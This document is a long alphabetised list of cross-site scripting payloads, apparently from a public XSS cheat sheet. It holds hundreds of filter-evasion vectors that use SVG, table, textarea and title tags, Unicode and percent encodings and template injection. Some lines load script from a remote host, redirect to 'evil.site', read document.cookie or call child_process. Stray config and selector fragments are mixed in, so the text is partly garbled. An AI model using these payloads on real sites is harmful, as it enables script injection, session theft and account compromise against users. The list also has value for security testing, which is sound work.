<svg/onload=prompt(1)
— !><svg/onload=prompt(1)
“><svg/onload=prompt(1)>
><svg/onload=prompt(Xss)>
��><svg/onload=prompt(��Xss��)>
“/><svg/onload=(prompt)(/XSS/)>#
><svg/onload=prompt(Xss-By-Muhaddi)>
<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
“<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”
“\”><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”,
“><svg onload=”prompt(/xss/)”></svg>
<svg onload=setInterval(function(){d=document;
<svg onload=setInterval(function(){with(document)body.
<svg/onload=setInterval(function(){with(document)body.
<svg onload=setInterval(function(){with(document)body.appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
<svg/onload=setTimeout`alert\`1\``>
<svg onload svg onload=”javascript:javascript:alert(1)”></svg onload>
<svg onLoad svg onLoad=”javascript:javascript:alert(1)”></svg onLoad>
<svg/onload=top[��loca��%2b��tion��]=name//
<svg/onload=top[loca%2btion]=name//
<svg/onload=top[/loca/.source%2b/tion/.source]=name//
<svg/onload=u=URL,l=u.length,location=/javascrip/.source%2Bu[1]%2Bu[4]%2B/alert/.source%2Bu[l-2]%2b1%2Bu[l-1]>#()
<svg/onload=u=URL,l=u.length,location=/javascrip/.source+u[1]+u[4]+/alert/.source+u[l-2]+1+u[l-1]>#()
<svg onload=”void ‘javascript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e’;”></svg>
<svg onload=”void ‘javascript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d
<svg/onload=window.onerror=alert;throw/XSS/;//
<svg/onload=window.onerror=confirm;throw/5/;//
<svg/onload=window.onerror=confirm;throw/XSS/;//”
<svg/onload=window.onerror=confirm;throw/XSS/;//
<svg onload=write(1)>
<svg onresize=”alert(1)”>
<svg onResize svg onResize=”javascript:javascript:alert(1)”></svg onResize>
<svg onunload svg onunload=”javascript:javascript:alert(1)”></svg onunload>
<svg onUnload svg onUnload=”javascript:javascript:alert(1)”></svg onUnload>
<svg><oooooo/oooooooooo/onload=alert(1) >
<svg o<script>nload=alert(1)>
<svg o<script>nload=alert(6)>
<sVG/renwa/OnLoaD+=”window[‘confirm’]+(1)”>
<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
<sVg><scRipt %00>confirm&lpar;1&rpar;
<sVg><scRipt %00>prompt&lpar;/@soaj1664ashar/&rpar;????????????????
<svg><script>0<[alert(36)]</script>
<svg><script>123<1>alert(123)</script>
<svg><script>alert( 1)
<svg><script ?>alert(1)
“><svg><script>alert`1`
“><svg><script>/<@/>alert(1337)</script>
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
<svg><script>/<@/>alert(1)</script>//INJECTX
<svg><script>alert(1)&sol;&sol;!#ERROR?&^%$#</script></svg>
<svg><script>alert&#40 1&#41
<svg><script>alert&#40 1&#41
<svg><script>alert&#401&#41
<Svg> <script> alert & # 40 1 & # 41
<svg><script>alert&#40/1/&#41</script>
<Svg> <script> alert & # 40/1 / & # 41 </ script>
<svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p>
<svg><script>alert&grave;1&grave;<p>
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<svg><script>alert&lpar;1&rpar;</script>
<svg><script>a=’<svg/onload=alert(1)></svg>’;alert(2)</script>
<svg><script>a<svg//onload=confirm(2) />lert(1)</script>
<svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
<svg><script ?>confirm(1);
<svg><script ?>confirm(1)
<svg><script>confirm&#40/1/&#41</script>
<svg><script>confirm&DiacriticalGrave;1&DiacriticalGrave;<p><svg><script>confirm&grave;1&grave;<p>
<svg><script>confirm(“&quot;);confirm(‘yes’)//no”)</script>
<svg><script>location&equals;&#60&#62javascript&amp;#x3A;alert(1)&#60&#33&#47&#62;</script>
<svg><script>location&equals;&#60&#62javascript&amp;#x3A;confirm(1)&#60&#33&#47&#62;</script>
<svg><script>/*&midast;&sol;alert(‘ @0x6D6172696F ‘)&sol;&sol;*/</script></svg>?
<svg><script>/*&midast;&sol;confirm(3)&sol;&sol;*/</script></svg>
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script>//&NewLine;confirm(1);</script </svg>
“/><svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<svg><script onlypossibleinopera:-)> alert(1)
<svg><script onlypossibleinopera:-)> confirm(1)
<svg><script>prompt&#40 1&#41<i>
<svg><script>prompt&#40;1)<b>
<svg><script>prompt&#40;1)</script>
<svg><script>varmyvar=”text”;alert(1)//”;</script></svg>
<svg><script>varmyvar=”text&quot;;alert(1)//”;</script></svg>
<Svg> <script> varmyvar = “text & quot ;; alert (1) //”; </ script> </ svg>
<svg><script>varmyvar=vYourInputv;</script></svg>
<svg><script>varmyvar=YourInput;</script></svg>
<Svg> <script> varmyvar = “YourInput”; </ script> </ svg>
<svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js'
<svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js' {Opera}
<svg><script/XL:href=&VeryThinSpace;data&colon;;;;base64;;;;&comma;&lt;&gt;��YWx��lc��nQ��oMSk��=> mix!
<svg><script xlink:href=”data:,alert(1)”>
<svg><script xlink:href=data:,alert(1) /> *
<svg><script xlink:href=data:,alert(1) />
<svg><script xlink:href=data:,alert(1) />
“><svg><script/xlink:href=”data:,alert(1)
<svg><script xlink:href=data:,alert(174) />
<svg><script xlink:href=data:,alert(1)></script>
<svg><script/xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/')></script
<svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/') </script
<svg><set href=#k attributename=href to=data:,alert(59)><script id=k></script>
<svg><style>{font-family&colon;’<iframe/onload=confirm(1)>’
<svg><style>*{font-family:’<svg onload=alert(1)>’;}</style></svg>
<svg><style>*{font-family:’<svg onload=confirm(1)>’;}</style></svg>
<svg><style>&lt;img/src=x onerror=alert(1)// </b>
<svg><style>&ltimg src=x onerror=confirm(1)&gt</svg>
“><svg><style>{-o-link-source&colon;’<body/onload=confirm(1)>’
</svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert&#x28;1&#x29; {Opera}
</svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>confirm&#x28;1&#x29;
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
<svg[U+000B]onload=alert(1)>
<svg><use xlink:href=”data:image&sol;svg&plus;xml&semi;ba &NewLine;se&Tab;64&semi;&comma;PHN2ZyBpZD 0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53M y5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3a WR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8 YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0K GxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lk dGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC 9zdmc+#rectangle” /></svg>
<svg><use xlink:href=data:image/svg+xml;base64,PHN2ZyBpZD0iYnJ1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiPg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYWluKSIvPjwvc3ZnPg==#klutz>
<svg><use xlink:href=’data:image/svg+xml,<svg id=”klutz” xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink"><embed xmlns=”http://www.w3.org/1999/xhtml" src=”javascript:alert(document.domain)”/></svg>#klutz’>
<svg><!V-alert(1)-
<svg><!V’-alert(1)-’
<svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javas&#99ript:alert(1)>
<svg xml:base=”data:text/html,<script>confirm(1)</script>”><a xlink:href=”#”><circle r=”40"></circle></a></svg>
<svg xmlns=”http://www.w3.org/2000/svg">
<svg xmlns=��http://www.w3.org/2000/svg��>
<svg xmlns=”http://www.w3.org/2000/svg"> <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(9)”><rect width=”1000" height=”1000" fill=”white”/></a> </svg>
<svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(1)”></g></svg>
<svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(9)”></g></svg>
<svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:confirm(1)”></g></svg>
<svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> //
<svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
<svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
<Svg xmlns = “http://www.w3.org/2000/svg"> <g onload = “javascript: \ u0061lert (1);”> </ g> </ svg>
<svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> // By Secalert
<svg xmlns=”http://www.w3.org/2000/svg" id=”foo”>
<svg xmlns=”http://www.w3.org/2000/svg" id=”x”>
<svg xmlns=”http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
<svg xmlns=”http://www.w3.org/2000/svg" onload=”alert(document.domain)”/>
<svg xmlns=”http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
<svg xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink">
<svg xmlns=”#”><script>alert(1)</script></svg>
<svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100
<svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href”
<svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
<Svg xmlns: xlink = “http://www.w3.org/1999/xlink"> <a> <circle r = 100 /> <animate attributeName = “xlink: href” values ??= “; javascript: alert (1 ) “begin =” 0s “dur =” 0.1s “fill =” freeze “/>
<svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/> // By Mario
<svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:confirm(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
<svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=”&#x3000;javascript:alert(10)” /><a id=x><rect width=100 height=100 /></a>
<svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=”&#x3000;javascript:alert(1)” /><a id=x><rect width=100 height=100 /></a>
<svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
<svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
<svG x=”>” onload=(co\u006efirm)``>
<svg><x><script>alert(177)</x>
<svg><x><script>alert(1)</x>
<svg/x=”> <script>alert(37)</script> <”onload=alert(370)>
<svg><x><script>alert&#40;&#39;1&#39;&#41</x>
<svg></ y=”><x” onload=alert(‘@0x6D6172696F’)>
<svg></y=”><x” onload=alert(1)>
<svg></ y=”><x” onload=confirm(4)>
swfupload.swf?buttonText=test<a href=”javascript:confirm(1)”><img src=”https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
swfupload.swf?movieName=”]);}catch(e){}if(!self.a)self.a=!alert(1);//
<[S]x onx[S]xx=1
‘/(\t)/’,
<table background=”javascript:alert(1)”></table>
<table background=javascript:alert(1)></table>
<table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6
<TABLE BACKGROUND=”javascript:alert(‘XSqS’)”>
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
<TABLE BACKGROUND=”javascript:alert(XSS)”>
<table background=javascript:alert(/xss/)></table>/
<;TABLE BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TABLE>;
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”></TABLE>
<TABLE BACKGROUND=”javascript:confirm(document.location)”>
<table BACKGROUND=”javascript:document.vulnerable=true;”>
<table background=”javascript:javascript:alert(1)”>
<TABLE BACKGROUND=”javascript:javascript:alert(1)”>
<TABLE id=XSS BACKGROUND=”javascript:alert(‘XSS’)”>
<TABLE id=XSS><TD BACKGROUND=”javascript:alert(‘XSS’)”>
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>”
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
<TABLE><TD BACKGROUND=”javascript:alert(XSS)”>
<;TABLE>;<;TD BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TD>;<;/TABLE>;
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”></TD></TABLE>
<table><TD BACKGROUND=”javascript:document.vulnerable=true;”>
<TABLE><TD BACKGROUND=”javascript:javascript:alert(1)”>
<table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bconfirm(1)%09><td>AAAAAAAAA
<table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt(1)%09><td>AAAAAAAAA
<TAG EVENT=alert(1)>
<tag handler=code>
{tag}<img name=”{/tag} <img src=xx:x onerror=alert({{i}})//”>
<TAG RESOURCE=javascript:alert(1)>
tags =querySelectorAll(“.class1”);
tags =querySelectorAll(“[data-foo]”);
tags =querySelectorAll(“[data-foo^=bar]”);
tags =querySelectorAll(“myTag”);
tags = querySelectorAll(“#someId”);
</tag><svg onload=alert(1)>
“></tag><svg onload=alert(1)>
?TargetAS=javascript:alert(1)”,
target=x><input type=hidden name=comment>click me!</form>
?t=confirm(1)&k7=”><svg/t=’&k8=’onload=’/&k9=/+eval(t)’
<TD BACKGROUND=”javascript:alert(‘XSS’)”>
<td width=”628" background=”/img/index2_r7_c2_r1_c5_s1_s1.jpg”>
‘te’ ? alert(‘ifelsesh’) : ‘xt’;
‘te’ ^ alert(‘^’) ^ ‘xt’;
‘te’ < alert(‘<’) < ‘xt’;
‘te’ == alert(‘==’) == ‘xt’;
‘te’ > alert(‘>’) > ‘xt’;
‘te’ | alert(‘|’) | ‘xt’;
‘te’ — alert(‘-’) — ‘xt’;
‘te’ , alert(‘,’) , ‘xt’;
‘te’ ; alert(‘;’) ; ‘xt’;
‘te’ ? alert(‘?:’) : ‘xt’;
‘te’ / alert(‘/’) / ‘xt’;
‘te’ * alert(‘*’) * ‘xt’;
‘te’ & alert(‘&’) & ‘xt’;
‘te’ % alert(‘%’) % ‘xt’;
‘te’ + alert(‘+’) + ‘xt’;
‘te’ in alert(‘in’) in ‘xt’;
‘te’ instanceof alert(‘instanceof’) instanceof ‘xt’;
template is=dom-bind div
><test onclick=alert(/Xss-By-Muhaddi/)>Click Me</test>
><test onclick=alert(/Xss/)>Click Me</test>
��><test onclick=alert(/Xss/)>Click Me</test>
test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script&notbot=UzXGjMCo8AoAAFUcKTEAAAAN
‘text’ ( alert(‘()’) );
‘text’ [ alert(‘[]’) ];
text;alert(1)//
<textarea autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>//INJECTX
<textarea autofocus onfocus=confirm(3)>
“><textarea autofocus onfocus=co\u006efir\u006d(1)>
“><textarea autofocus onfocus=prompt(1)>
<!</textarea <body onload=’alert(1)’>
</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
<textarea id=ta onfocus=%22write(‘<script>alert(1)</script>’)%22 autofocus></textarea>
<textarea id=ta onfocus=%22write(‘<script>confirm(1)</script>’)%22 autofocus></textarea>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
“/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
<textarea id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
<textarea>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
<textarea name=’file”; filename=”test.<img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;>’>
<textarea name=p id=p>”
<textarea name=p id=p>
“<textarea onmousemove=’confirm(1);’>”
</textarea>’”><script>alert(document.cookie)</script>
</textarea>’”><script>alert(document.cookie)</script>
</textarea><script>alert(/xss/)</script>
</textarea>’”><script>alert(XSS)</script>
</textarea><ScRiPt>prompt(/man shum/)</ScRiPt//
‘//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
<textarea></textarea>test<! — </textarea><img src=xx: onerror=confirm(1)> →
textContent, nextSibling.nodeValue, firstChild.nodeValue, lastChild.nodeValue, innerHTML
this+1;
this[[]+(‘eva’)+(/x/,new Array)+’l’](/xxx.xxx.xxx.xxx.xx/+name,new Array)
this[Object[“keys”](this)[146]](1)
this[Object[“keys”](this)[5]](1)
this[“ownerDocu”+”ment”][“loca”+”tion”]=��//google.com��
three=”{{set(‘me’,nextSibling.previousSibling)}}”
throw delete~typeof~confirm(1)/
\));throw_error()}catch(e){alert(document.domain))}//
<TimeDisplayFont>Arial</TimeDisplayFont>
<TimeDisplayFontColor>000000</TimeDisplayFontColor>
<TimeDisplayFormat>MM:SS</TimeDisplayFormat>
</title””>
<””/title>
<title>*/;alert(2);function%20text(){};function%20html(){}
</title><frameset><frame src=”data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>”>
</title><frameset><frame src=”data:text/html,<script>confirm(1)</script>”>
</title id=””>
<title><img src=”</title><img src=x onerror=alert(1)//”> // by evilcos
<title>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title>
<title onpropertychange=alert(1)></title><title title=>
<title onpropertychange=alert(1)></title><title title=></title>
<title onpropertychange=javascript:alert(1)></title><title title=>
<title onPropertyChange title onPropertyChange=”javascript:javascript:alert(1)”></title onPropertyChange>
‘“></title><script>alert(1111)</script>
‘“></title><script>alert(1111)</script>
‘“></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
</title></script>”-alert(187)-”><svg onload=’;alert(1870);’>
</title><script>alert(1)</script>
</title></script>”-alert(46)-”><svg onload=’;alert(460);’>
</TITLE><SCRIPT>alert(“XSS”)
‘“></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
“>></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
</title><script>alert(/xss/)</script>
<;/TITLE>;<;SCRIPT>;alert(“XSS”);<;/SCRIPT>;
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
</title><SCRIPT>document.vulnerable=true;</script>
</title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
/</title/’/</style/</script/ →<p” onclick=alert()//>*/alert()/*
/</title/’/</style/</script/</textarea/ →<p” onclick=alert()//>*/alert()/*
</title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
</title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
toJSON=alert;JSON.stringify(window);
top[630038579..toString(30)](1)
top[8680439..toString(30)](1)
top[8680439..toString(30)](7);
top[8680439..toString(30)](90)
top[‘al\145rt’](1)
top[‘al\145rt’](88)
top[“al”+”ert”](1)
top[“al”+”ert”](5);
top[“al”+”ert”](85)
top[/al/.source+/ert/.source](1)
top[/al/.source+/ert/.source](8);
top[/al/.source+/ert/.source](86)
top[‘al\x65rt’](1)
top[‘al\x65rt’](89)
top[‘al\x65rt’](9);
top[atob(‘cHJvbXB0’)]()
top[‘con’.concat(‘firm’)](1)
top.require(‘child_process’).execSync(‘open -a Calculator’)
top[unescape(‘%61%6c%65%72%74’)]()
“”+{toString:alert}
{…{toString:()=>alert()}}
toString=alert; this+’1';
{{{}.toString.constructor(‘confirm(1)’)()}}
{{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat;
{{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat; $eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor);}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor)}}
{{{}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)//’); }}
{{ {}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=’’.valueOf; $eval(‘x=alert(1)//’); }}
toUpperCase XSS document.write(‘<? oncl?ck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</?>
try{?????????????????????????????=0;?????????????????????????????()}catch(e){alert(e)}
try{‘a’ (alert(1)) in ‘a’}catch(e){ ‘a’ (alert(2)) instanceof ‘a’}
try{confirm(document.domain)}catch(e){location.reload()}
(()=>{try{return alert(1),eval(‘throw 1’);}catch(e){return alert(2)}finally{return alert(3)}})()
try{!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
<t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”>
<t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”>
two={{set(‘_nodes.0.scriptprop.src’,’data:\,’)}}
typeof delete typeof delete void void new new alert`1`
%u0022%u003e
%u0022%u003e%u003cscript%u003ealert(1);%u003c/script%u003e
%u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
%u0022%u003e%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
%u0022%u003e%u003cscript%u003ealert(XSS);%u003c/script%u003e
%u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065
\u0027-confirm`1`-\u0027
\u003c
\u003C
\u003cimg src=1 onerror=alert(/xss/)\u003e
u003cimg src=1 onerror=alert(/xss/)u003e
\u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e
%u003cscript%u003ealert(1);%u003c/script%u003e
%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
%u003cscript%u003ealert%u00281uff09%u003b%u003c%uff0fscript%u003e
%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
%u003cscript%u003ealert(XSS);%u003c/script%u003e
\u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e
\u003csvg/onload=alert`1`\u003e
%u003csvg onload=alert(55)>
\u003e
\u003E
\u0061lert(1)
\u0061\u006c\u0065\u0072\u0074
\u0061\u006c\u0065\u0072\u0074(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
[U+2028]confirm(1)
[U+2028]prompt(1)[U+2028] →
U+2200 = [0x00][0x00][0x22][0x00]
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
%u3008svg onload=alert(56)>
> U+3C00 = [0x00][0x00][0x3C][0x00]
< U+3E00 = [0x00][0x00][0x3E][0x00]
\u{61}l\u{65}rt`1`
\u{61}|\u{65}rt`1`
u;alert(1)//
%uff02%uff1e
%uff02%uff1e%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
%uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
%uff02%uff1e%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
%uff02%uff1e%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
%uff02%uff1e%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
%uff1cimg%20src=x%20onerror=prompt(1)%uff1e
%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’”>>”
‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’
%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
%uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e
%uff1csvg onload=alert(57)>
\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
%uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e
%ufflcxss%2f%uffle
<ul><li><svg onload=”confirm(1)”></li></ul>
u/><marquee onfinish=confirm(123)>a</marquee>
[unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)]
[unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
(unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
unescape(escape(“????????”).replace(/u../g,’’))
;(unescape=eval);
;(unescape=eval); // redeclare functions
?URI=javascript:alert(1)”,
*/(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())’%3E%3C%%20style=’x:expression/*
url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E”>
?url=javascript:alert(1)”,
